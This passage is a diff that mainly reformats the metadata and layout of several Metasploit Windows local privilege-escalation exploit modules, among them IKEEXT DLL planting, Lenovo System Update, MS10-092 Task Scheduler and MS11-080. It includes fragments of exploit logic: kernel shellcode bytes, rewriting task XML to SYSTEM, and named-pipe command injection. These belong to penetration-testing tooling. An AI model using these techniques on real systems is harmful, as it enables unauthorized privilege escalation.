@@ -13,49 +13,49 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Services
   include Msf::Post::Windows::Accounts
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'        => 'IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL',
-      'Description' => %q{
-        This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'
-        (IKEEXT) service which runs as SYSTEM, and starts automatically in default
-        installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.
-      },
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL',
+        'Description' => %q{
+          This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'
+          (IKEEXT) service which runs as SYSTEM, and starts automatically in default
+          installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.
+        },
+        'References' => [
           ['URL', 'https://www.htbridge.com/advisory/HTB23108'],
           ['URL', 'https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html']
         ],
-      'DisclosureDate' => '2012-10-09',
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'DisclosureDate' => '2012-10-09',
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Ben Campbell'
         ],
-      'Platform'       => [ 'win'],
-      'Targets'        =>
-        [
+        'Platform' => [ 'win'],
+        'Targets' => [
           [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
         ],
-      'SessionTypes'   => [ "meterpreter" ],
-      'DefaultOptions' =>
-        {
+        'SessionTypes' => [ "meterpreter" ],
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
           'WfsDelay' => 5,
           'ReverseConnectRetries' => 255
         },
-      'DefaultTarget'  => 0
-    ))
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options([
       OptString.new("DIR", [ false, "Specify a directory to plant the DLL.", ""])
     ])
     @service_name = 'IKEEXT'
-    @load_lib_search_path = [	'%SystemRoot%\\System32',
-            '%SystemRoot%\\System',
-            '%SystemRoot%'
-          ]
+    @load_lib_search_path = [
+      '%SystemRoot%\\System32',
+      '%SystemRoot%\\System',
+      '%SystemRoot%'
+    ]
     @non_existant_dirs = []
   end
 
@@ -243,9 +243,10 @@ class MetasploitModule < Msf::Exploit::Local
       if service_information[:starttype] == START_TYPE_AUTO
         if job_id
           print_status("Unable to start service, handler running waiting for a reboot...")
-          while(true)
+          while (true)
             break if session_created?
-            select(nil,nil,nil,1)
+
+            select(nil, nil, nil, 1)
           end
         else
           fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
@@ -256,4 +257,3 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 end
-

--- a/modules/exploits/windows/local/ipass_launch_app.rb
+++ b/modules/exploits/windows/local/ipass_launch_app.rb
@@ -12,48 +12,47 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Services
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'            => 'iPass Mobile Client Service Privilege Escalation',
-      'Description'     => %q{
-        The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact
-        with the iPass service. The service provides a LaunchAppSysMode command which
-        allows to execute arbitrary commands as SYSTEM.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'h0ng10' # Vulnerability discovery, metasploit module
-        ],
-      'Arch'            => ARCH_X86,
-      'Platform'        => 'win',
-      'SessionTypes'    => ['meterpreter'],
-      'DefaultOptions'  =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC'    => 'thread',
-        },
-      'Targets'         =>
-        [
-          [ 'Windows', { } ]
-        ],
-      'Payload'         =>
-        {
-          'Space'       => 2048,
-          'DisableNops' => true
-        },
-      'References'      =>
-        [
-          ['CVE', '2015-0925'],
-          ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt']
-        ],
-      'DisclosureDate' => '2015-03-12',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'iPass Mobile Client Service Privilege Escalation',
+          'Description' => %q{
+            The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact
+            with the iPass service. The service provides a LaunchAppSysMode command which
+            allows to execute arbitrary commands as SYSTEM.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'h0ng10' # Vulnerability discovery, metasploit module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [ 'Windows', {} ]
+          ],
+          'Payload' => {
+            'Space' => 2048,
+            'DisableNops' => true
+          },
+          'References' => [
+            ['CVE', '2015-0925'],
+            ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt']
+          ],
+          'DisclosureDate' => '2015-03-12',
+          'DefaultTarget' => 0
+        }
+      )
+    )
 
     register_options([
       OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)'])
     ])
-
   end
 
   def check
@@ -89,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-
   def open_named_pipe(pipe)
     invalid_handle_value = 0xFFFFFFFF
 
@@ -112,7 +110,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     true
   end
-
 
   def is_running?
     begin

--- a/modules/exploits/windows/local/lenovo_systemupdate.rb
+++ b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -12,55 +12,54 @@ class MetasploitModule < Msf::Exploit::Local
 
   Rank = ExcellentRanking
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'            => 'Lenovo System Update Privilege Escalation',
-      'Description'     => %q{
-        The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
-        System update service. The service provides the possibility to execute arbitrary
-        commands as SYSTEM if a valid security token is provided. This token can be generated
-        by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
-        System Update is stopped by default but can be started/stopped calling the Executable
-        ConfigService.exe.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'Michael Milvich', # vulnerability discovery, advisory
-          'Sofiane Talmat',  # vulnerability discovery, advisory
-          'h0ng10'           # Metasploit module
-        ],
-      'Arch'            => ARCH_X86,
-      'Platform'        => 'win',
-      'SessionTypes'    => ['meterpreter'],
-      'DefaultOptions'  =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC'    => 'thread',
-        },
-      'Targets'         =>
-        [
-          [ 'Windows', { } ]
-        ],
-      'Payload'         =>
-        {
-          'Space'       => 2048,
-          'DisableNops' => true
-        },
-      'References'      =>
-        [
-          ['OSVDB', '121522'],
-          ['CVE', '2015-2219'],
-          ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
-        ],
-      'DisclosureDate' => '2015-04-12',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'Lenovo System Update Privilege Escalation',
+          'Description' => %q{
+            The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
+            System update service. The service provides the possibility to execute arbitrary
+            commands as SYSTEM if a valid security token is provided. This token can be generated
+            by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
+            System Update is stopped by default but can be started/stopped calling the Executable
+            ConfigService.exe.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Michael Milvich', # vulnerability discovery, advisory
+            'Sofiane Talmat',  # vulnerability discovery, advisory
+            'h0ng10'           # Metasploit module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [ 'Windows', {} ]
+          ],
+          'Payload' => {
+            'Space' => 2048,
+            'DisableNops' => true
+          },
+          'References' => [
+            ['OSVDB', '121522'],
+            ['CVE', '2015-2219'],
+            ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
+          ],
+          'DisclosureDate' => '2015-04-12',
+          'DefaultTarget' => 0
+        }
+      )
+    )
 
     register_options([
       OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),
       OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),
     ])
-
   end
 
   def check
@@ -79,7 +78,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-
   def write_named_pipe(pipe, command)
     invalid_handle_value = 0xFFFFFFFF
 
@@ -93,7 +91,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     begin
-
       # First, write the string length as Int32 value
       w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)
 
@@ -115,7 +112,6 @@ class MetasploitModule < Msf::Exploit::Local
     true
   end
 
-
   def get_security_token(lenovo_directory)
     unless client.railgun.get_dll('tvsutil')
       client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
@@ -124,14 +120,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
 
-    dll_response['systeminfo'][0,40]
+    dll_response['systeminfo'][0, 40]
   end
-
 
   def config_service(lenovo_directory, option)
     cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")
   end
-
 
   def exploit
     if is_system?

--- a/modules/exploits/windows/local/lexmark_driver_privesc.rb
+++ b/modules/exploits/windows/local/lexmark_driver_privesc.rb
@@ -40,24 +40,21 @@ class MetasploitModule < Msf::Exploit::Local
           'Shelby Pace', # original Ricoh driver module
           'Grant Willcox' # module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2021-35449'],
-            [ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953'],
-            [ 'URL', 'https://github.com/jacob-baines/concealed_position'],
-            [ 'URL', 'https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf']
-          ],
+        'References' => [
+          [ 'CVE', '2021-35449'],
+          [ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953'],
+          [ 'URL', 'https://github.com/jacob-baines/concealed_position'],
+          [ 'URL', 'https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf']
+        ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Platform' => 'win',
         'SessionTypes' => [ 'meterpreter' ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
-            ]
-          ],
-        'Notes' =>
-        {
+            'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+          ]
+        ],
+        'Notes' => {
           'SideEffects' => [ ARTIFACTS_ON_DISK ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'Stability' => [ SERVICE_RESOURCE_LOSS ]

--- a/modules/exploits/windows/local/microfocus_operations_privesc.rb
+++ b/modules/exploits/windows/local/microfocus_operations_privesc.rb
@@ -25,46 +25,43 @@ class MetasploitModule < Msf::Exploit::Local
           Note that it is only exploitable on Windows installations.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
-          ],
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+        ],
         'Platform' => 'win',
         'Privileged' => true,
         'SessionTypes' => ['meterpreter'],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Micro Focus Operations Bridge Manager (Windows) <= 2020.05',
-              {
-                'Path' => 'C:\HPBSM\AppServer\webapps\site.war\LB_Verify.jsp',
-                'Url' => '/topaz/LB_Verify.jsp',
-                'DefaultOptions' => { 'RPORT' => 443 }
-              }
-            ],
-            [
-              'Micro Focus Operations Bridge Reporter (Windows) <= 10.40',
-              {
-                # for OBR only:
-                # - actually we can use any other name besides LB_Verify.jsp
-                # - we can also use any other folder, doesn't need to be BI, as long as
-                # it's reachable on the web server without authentication
-                'Path' => 'C:\HPE-OBR\PMDB\BOWebServer\webapps\BI\LB_Verify.jsp',
-                'Url' => '/BI/LB_Verify.jsp',
-                'DefaultOptions' => { 'RPORT' => 8443 }
-              }
-            ]
+            'Micro Focus Operations Bridge Manager (Windows) <= 2020.05',
+            {
+              'Path' => 'C:\HPBSM\AppServer\webapps\site.war\LB_Verify.jsp',
+              'Url' => '/topaz/LB_Verify.jsp',
+              'DefaultOptions' => { 'RPORT' => 443 }
+            }
           ],
-        'References' =>
           [
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],
-            [ 'CVE', '2020-11858'],
-            [ 'CVE', '2020-11855'],
-            [ 'ZDI', '20-1326'],
-            [ 'ZDI', '20-1217'],
-          ],
+            'Micro Focus Operations Bridge Reporter (Windows) <= 10.40',
+            {
+              # for OBR only:
+              # - actually we can use any other name besides LB_Verify.jsp
+              # - we can also use any other folder, doesn't need to be BI, as long as
+              # it's reachable on the web server without authentication
+              'Path' => 'C:\HPE-OBR\PMDB\BOWebServer\webapps\BI\LB_Verify.jsp',
+              'Url' => '/BI/LB_Verify.jsp',
+              'DefaultOptions' => { 'RPORT' => 8443 }
+            }
+          ]
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],
+          [ 'CVE', '2020-11858'],
+          [ 'CVE', '2020-11855'],
+          [ 'ZDI', '20-1326'],
+          [ 'ZDI', '20-1217'],
+        ],
         'DisclosureDate' => '2020-10-28',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/windows/local/mov_ss.rb
+++ b/modules/exploits/windows/local/mov_ss.rb
@@ -14,58 +14,57 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
-      'Description'    => %q(
-        This module exploits a vulnerability in a statement in the system programming guide
-        of the Intel 64 and IA-32 architectures software developer's manual being mishandled
-        in various operating system kerneles, resulting in unexpected behavior for #DB
-        excpetions that are deferred by MOV SS or POP SS.
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
+        'Description' => %q{
+          This module exploits a vulnerability in a statement in the system programming guide
+          of the Intel 64 and IA-32 architectures software developer's manual being mishandled
+          in various operating system kerneles, resulting in unexpected behavior for #DB
+          excpetions that are deferred by MOV SS or POP SS.
 
-        This module will upload the pre-compiled exploit and use it to execute the final
-        payload in order to gain remote code execution.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Nick Peterson',        # Original discovery (@nickeverdox)
+          This module will upload the pre-compiled exploit and use it to execute the final
+          payload in order to gain remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Nick Peterson', # Original discovery (@nickeverdox)
           'Nemanja Mulasmajic',   # Original discovery (@0xNemi)
           'Can Bölük <can1357>',  # PoC
           'bwatters-r7'           # msf module
         ],
-      'Platform'       => ['win'],
-      'SessionTypes'   => ['meterpreter'],
-      'Targets'        =>
-        [
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [
           ['Windows x64', { 'Arch' => ARCH_X64 }]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2018-05-08',
-      'References'     =>
-        [
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2018-05-08',
+        'References' => [
           ['CVE', '2018-8897'],
           ['EDB', '44697'],
           ['BID', '104071'],
           ['URL', 'https://github.com/can1357/CVE-2018-8897/'],
           ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'DisablePayloadHandler' => false
         }
-    ))
+      )
+    )
 
     register_options([
       OptBool.new('USE_INJECTION',
-        [true, 'Use in-memory dll injection rather than exe file uploads.', true]),
+                  [true, 'Use in-memory dll injection rather than exe file uploads.', true]),
       OptString.new('EXPLOIT_NAME',
-        [false, 'The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).', nil]),
+                    [false, 'The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).', nil]),
       OptString.new('PAYLOAD_NAME',
-        [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),
+                    [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),
       OptString.new('PATH',
-        [false, 'Path to write binaries if if USE_INJECTION=false(%TEMP% by default).', nil]),
+                    [false, 'Path to write binaries if if USE_INJECTION=false(%TEMP% by default).', nil]),
       OptInt.new('EXECUTE_DELAY',
-        [false, 'The number of seconds to delay before executing the exploit if USE_INJECTION=false', 3])
+                 [false, 'The number of seconds to delay before executing the exploit if USE_INJECTION=false', 3])
     ])
   end
 

--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -12,53 +11,52 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Process
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
-      'Description'    => %q(
-        A vulnerability within the MQAC.sys module allows an attacker to
-        overwrite an arbitrary location in kernel memory.
+    super(
+      update_info(
+        info,
+        'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
+        'Description' => %q{
+          A vulnerability within the MQAC.sys module allows an attacker to
+          overwrite an arbitrary location in kernel memory.
 
-        This module will elevate itself to SYSTEM, then inject the payload
-        into another SYSTEM process.
-      ),
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
+          This module will elevate itself to SYSTEM, then inject the payload
+          into another SYSTEM process.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Matt Bergin', # original exploit and all the hard work
           'Spencer McIntyre' # MSF module
         ],
-      'Arch'           => [ARCH_X86],
-      'Platform'       => ['win'],
-      'SessionTypes'   => ['meterpreter'],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC'   => 'thread'
+        'Arch' => [ARCH_X86],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
         },
-      'Targets'        =>
-        [
-          ['Windows XP SP3',
-           {
-             'HaliQuerySystemInfo' => 0x16bba,
-             '_KPROCESS'  => "\x44",
-             '_TOKEN'     => "\xc8",
-             '_UPID'      => "\x84",
-             '_APLINKS'   => "\x88"
-           }
+        'Targets' => [
+          [
+            'Windows XP SP3',
+            {
+              'HaliQuerySystemInfo' => 0x16bba,
+              '_KPROCESS' => "\x44",
+              '_TOKEN' => "\xc8",
+              '_UPID' => "\x84",
+              '_APLINKS' => "\x88"
+            }
           ]
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2014-4971'],
           ['EDB', '34112'],
           ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
         ],
-      'DisclosureDate' => '2014-07-22',
-      'DefaultTarget'  => 0,
-      'Notes'          =>
-        {
-          'Stability'   => [ CRASH_OS_RESTARTS, ],
+        'DisclosureDate' => '2014-07-22',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_OS_RESTARTS, ],
         }
-    ))
+      )
+    )
   end
 
   # Function borrowed from smart_hashdump
@@ -76,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
       next if p['pid'] == this_pid
       next if p['pid'] == 4
       next if p['user'] != system_account_name
+
       return p
     end
   end
@@ -135,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     haldispatchtable = find_haldispatchtable
     return if haldispatchtable.nil?
+
     print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")
 
     vprint_status('Getting the hal.dll base address...')
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
     hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
 
-    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs = "\x31\xc0" # xor eax, eax
     restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')          # mov dword ptr [nt!HalDispatchTable+0x4], eax
 

--- a/modules/exploits/windows/local/ms10_092_schelevator.rb
+++ b/modules/exploits/windows/local/ms10_092_schelevator.rb
@@ -11,45 +11,47 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'          => 'Windows Escalate Task Scheduler XML Privilege Escalation',
-      'Description'   => %q{
-          This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
-        When processing task files, the Windows Task Scheduler only uses a CRC32
-        checksum to validate that the file has not been tampered with. Also, In a default
-        configuration, normal users can read and write the task files that they have
-        created. By modifying the task file and creating a CRC32 collision, an attacker
-        can execute arbitrary commands with SYSTEM privileges.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'Windows Escalate Task Scheduler XML Privilege Escalation',
+          'Description' => %q{
+            This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
+            When processing task files, the Windows Task Scheduler only uses a CRC32
+            checksum to validate that the file has not been tampered with. Also, In a default
+            configuration, normal users can read and write the task files that they have
+            created. By modifying the task file and creating a CRC32 collision, an attacker
+            can execute arbitrary commands with SYSTEM privileges.
 
-        NOTE: Thanks to webDEViL for the information about disable/enable.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'jduck' ],
-      'Arch'          => [ ARCH_X86, ARCH_X64 ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       =>
-        [
-          [ 'Windows Vista, 7, and 2008', {} ],
-        ],
-      'References'    =>
-        [
-          [ 'OSVDB', '68518' ],
-          [ 'CVE', '2010-3338' ],
-          [ 'BID', '44357' ],
-          [ 'MSB', 'MS10-092' ],
-          [ 'EDB', '15589' ]
-        ],
-      'DisclosureDate'=> '2010-09-13',
-      'DefaultTarget' => 0
-    }))
+            NOTE: Thanks to webDEViL for the information about disable/enable.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [ 'jduck' ],
+          'Arch' => [ ARCH_X86, ARCH_X64 ],
+          'Platform' => [ 'win' ],
+          'SessionTypes' => [ 'meterpreter' ],
+          'Targets' => [
+            [ 'Windows Vista, 7, and 2008', {} ],
+          ],
+          'References' => [
+            [ 'OSVDB', '68518' ],
+            [ 'CVE', '2010-3338' ],
+            [ 'BID', '44357' ],
+            [ 'MSB', 'MS10-092' ],
+            [ 'EDB', '15589' ]
+          ],
+          'DisclosureDate' => '2010-09-13',
+          'DefaultTarget' => 0
+        }
+      )
+    )
 
     register_options([
-      OptString.new("CMD",      [ false, "Command to execute instead of a payload" ]),
+      OptString.new("CMD", [ false, "Command to execute instead of a payload" ]),
       OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
     ])
-
   end
 
   def check
@@ -93,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Local
     unless cmd
       # Get the exe payload.
       exe = generate_payload_exe
-      #and placing it on the target in %TEMP%
-      tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
+      # and placing it on the target in %TEMP%
+      tempexename = Rex::Text.rand_text_alpha(rand(8) + 6)
       cmd = tempdir + "\\" + tempexename + ".exe"
 
       print_status("Preparing payload at #{cmd}")
@@ -106,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Local
     #
     # Create a new task to do our bidding, but make sure it doesn't run.
     #
-    taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
+    taskname ||= Rex::Text.rand_text_alphanumeric(8 + rand(8))
     sysdir = session.sys.config.getenv('SystemRoot')
     taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
 
@@ -122,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
     #
     # Double-check that we got what we expect.
     #
-    if content[0,2] != "\xff\xfe"
+    if content[0, 2] != "\xff\xfe"
       #
       # Convert to unicode, since it isn't already
       #
@@ -131,9 +133,8 @@ class MetasploitModule < Msf::Exploit::Local
       #
       # NOTE: we strip the BOM here to exclude it from the crc32 calculation
       #
-      content = content[2,content.length]
+      content = content[2, content.length]
     end
-
 
     #
     # Record the crc32 for later calculations
@@ -152,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Local
     content.gsub!('LeastPrivilege', 'HighestAvailable')
     content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
     content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
-    #content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
+    # content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
     content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
     content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
     content << "<!-- ZZ -->"
@@ -194,7 +195,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Executing the task...")
     exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
-
 
     #
     # And delete it.
@@ -308,7 +308,6 @@ class MetasploitModule < Msf::Exploit::Local
       end
     }
   end
-
 
   def read_task_file(taskname, taskfile)
     print_status("Reading the task file contents from #{taskfile}...")

--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
   # Average because this module relies on memory corruption within the
@@ -16,70 +15,72 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Process
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'           => 'MS11-080 AfdJoinLeaf Privilege Escalation',
-      'Description'    => %q(
-        This module exploits a flaw in the AfdJoinLeaf function of the
-        afd.sys driver to overwrite data in kernel space.  An address
-        within the HalDispatchTable is overwritten and when triggered
-        with a call to NtQueryIntervalProfile will execute shellcode.
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation',
+          'Description' => %q{
+            This module exploits a flaw in the AfdJoinLeaf function of the
+            afd.sys driver to overwrite data in kernel space.  An address
+            within the HalDispatchTable is overwritten and when triggered
+            with a call to NtQueryIntervalProfile will execute shellcode.
 
-        This module will elevate itself to SYSTEM, then inject the payload
-        into another SYSTEM process before restoring its own token to
-        avoid causing system instability.
-      ),
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
-          'Matteo Memelli', # original exploit and all the hard work
-          'Spencer McIntyre' # MSF module
-        ],
-      'Arch'           => [ARCH_X86],
-      'Platform'       => ['win'],
-      'SessionTypes'   => ['meterpreter'],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC'   => 'thread'
-        },
-      'Targets'        =>
-        [
-          ['Automatic', {}],
-          ['Windows XP SP2 / SP3',
-            {
-              'HaliQuerySystemInfo' => 0x16bba,
-              'HalpSetSystemInformation' => 0x19436,
-              '_KPROCESS' => "\x44",
-              '_TOKEN' => "\xc8",
-              '_UPID' => "\x84",
-              '_APLINKS' => "\x88"
-            }
+            This module will elevate itself to SYSTEM, then inject the payload
+            into another SYSTEM process before restoring its own token to
+            avoid causing system instability.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Matteo Memelli', # original exploit and all the hard work
+            'Spencer McIntyre' # MSF module
           ],
-          ['Windows Server 2003 SP2',
-            {
-              'HaliQuerySystemInfo' => 0x1fa1e,
-              'HalpSetSystemInformation' => 0x21c60,
-              '_KPROCESS' => "\x38",
-              '_TOKEN' => "\xd8",
-              '_UPID' => "\x94",
-              '_APLINKS' => "\x98"
-            }
-          ]
-        ],
-      'References'     =>
-        [
-          %w(CVE 2011-2005),
-          %w(OSVDB 76232),
-          %w(EDB 18176),
-          %w(MSB MS11-080),
-          %w(URL http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/)
-        ],
-      'DisclosureDate' => '2011-11-30',
-      'DefaultTarget'  => 0,
-      'Notes'          =>
-        {
-          'Stability'   => [ CRASH_OS_RESTARTS, ],
-        },
-    }))
+          'Arch' => [ARCH_X86],
+          'Platform' => ['win'],
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            ['Automatic', {}],
+            [
+              'Windows XP SP2 / SP3',
+              {
+                'HaliQuerySystemInfo' => 0x16bba,
+                'HalpSetSystemInformation' => 0x19436,
